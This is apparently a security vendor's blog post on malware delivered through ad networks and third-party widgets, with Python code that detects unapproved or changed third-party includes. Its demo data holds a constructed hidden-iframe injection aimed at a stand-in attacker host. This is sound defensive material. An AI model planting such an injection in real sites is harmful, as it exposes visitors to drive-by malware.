According to reports on Twitter as well as on ZDNet over the weekend, visitors to several high-profile websites were blocked from accessing parts of the sites because an advertising partner, Eyewonder, suffered a malware attack.
Malicious advertisements are increasingly used by attackers as a vector for distributing malware through legitimate sites. In this case, the malicious code that the website ends up serving to its users is sourced from an advertising partner: the website itself has not been compromised, but the ad network it relies on has. Attackers use malicious ads to achieve scale and to avoid detection. Directly infecting a large number of high-profile websites would have been difficult; instead, the attackers leveraged the trusted relationship between the websites and their ad network to get malicious content (in this case an ad) served to the sites' end users. In some cases, Dasient has added ad networks to its internal blacklist to warn its customers when the ads those networks serve pose a risk of infecting their users.
In addition to malware arriving through ads, we have also seen cases where malicious code enters a website via content mash-ups or third-party widgets. For example, third-party widgets such as traffic counters have been used to infect websites (see section 4.4 of "The Ghost in the Browser"). Website owners have told us that their sites were infected not because an attacker exploited a vulnerability in the site, but because the site included a plug-in or widget that turned out to be malicious. In some cases the widget is benign for a long period (even years) and then abruptly changes behavior, either because the widget provider was itself malicious or, more likely, because the provider's servers were hacked.
Attackers will continue to find network and web application vulnerabilities that let them plant malicious code on websites directly. However, the Eyewonder incident makes clear that they will also exploit the trusted relationships between websites and their third-party advertising and content partners to achieve the same effect. The open web encourages sites to mash up best-of-breed content (and ads) from many sources, and every such inclusion extends the site's trust boundary to the partner's servers. To reduce risk, websites should perform due diligence on all third-party content and ad providers, and employ automated detection and remediation services.
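The two controls above, due diligence on partners and automated detection of a partner that changes behavior, can be approximated with a small monitoring check. The following is an added example written for this post; it is not Dasient's code or product, and the page markup, partner hostnames (`ads.example-adnetwork.test`, `counter.example-widget.test`) and served content are all constructed for the demo. It inventories the third-party script and iframe includes on a page, compares their hosts against an approved partner list, and hashes what each partner currently serves so that a later run can flag an include whose content changed, which is exactly the "benign for years, then malicious" widget case described above.

```python
"""Inventory third-party includes on a page and detect when a partner's
content changes.  Added example; not Dasient's code or product."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _IncludeCollector(HTMLParser):
    """Collects src attributes of <script> and <iframe> tags as absolute URLs."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            src = dict(attrs).get("src")
            if src:
                self.urls.append(urljoin(self.page_url, src))


def third_party_includes(html, page_url):
    """Script/iframe sources served from a host other than the page's own."""
    collector = _IncludeCollector(page_url)
    collector.feed(html)
    own_host = urlparse(page_url).hostname
    return [u for u in collector.urls if urlparse(u).hostname != own_host]


def unapproved_hosts(urls, approved_hosts):
    """Include hosts that are not on the vetted partner list (due diligence gap)."""
    return sorted({urlparse(u).hostname for u in urls} - set(approved_hosts))


def snapshot(urls, fetch):
    """Map each URL to the SHA-256 of what the partner currently serves.
    fetch(url) -> bytes is injected so the example runs offline."""
    return {u: hashlib.sha256(fetch(u)).hexdigest() for u in urls}


def diff_snapshots(baseline, current):
    """New, removed and changed includes relative to the stored baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(u for u in baseline
                          if u in current and baseline[u] != current[u]),
    }


# --- constructed demo data (hypothetical hosts, not real partners) ---------
PAGE_URL = "https://www.example.com/index.html"
APPROVED_HOSTS = {"ads.example-adnetwork.test", "counter.example-widget.test"}

PAGE_HTML = """
<html><body>
<script src="/js/site.js"></script>
<script src="https://ads.example-adnetwork.test/tag.js"></script>
<script src="//counter.example-widget.test/counter.js"></script>
<iframe src="https://ads.example-adnetwork.test/frame.html"></iframe>
</body></html>
"""

# Day 1: what the partners served when the baseline was taken.
DAY1 = {
    "https://ads.example-adnetwork.test/tag.js": b"document.write('<img src=banner.gif>');",
    "https://counter.example-widget.test/counter.js": b"document.write('hits: 42');",
    "https://ads.example-adnetwork.test/frame.html": b"<html>ad</html>",
}
# Day 2: the widget provider's server now appends a hidden iframe (constructed).
DAY2 = dict(DAY1)
DAY2["https://counter.example-widget.test/counter.js"] = (
    b"document.write('hits: 42');"
    b"document.write('<iframe src=https://evil.example.test/x.html width=0 height=0></iframe>');"
)


def run_demo():
    """Run inventory, partner-list check and baseline diff over the demo data."""
    urls = third_party_includes(PAGE_HTML, PAGE_URL)
    baseline = snapshot(urls, DAY1.__getitem__)
    today = snapshot(urls, DAY2.__getitem__)
    return {
        "third_party": urls,
        "unapproved": unapproved_hosts(urls, APPROVED_HOSTS),
        "diff": diff_snapshots(baseline, today),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

A hash mismatch is a prompt to review the new content, not proof of compromise: ad tags in particular rotate creatives, so in practice the baseline is kept on the partner's loader script rather than on each creative it pulls in, and the first-party `/js/site.js` is deliberately excluded because it sits inside the site's own trust boundary.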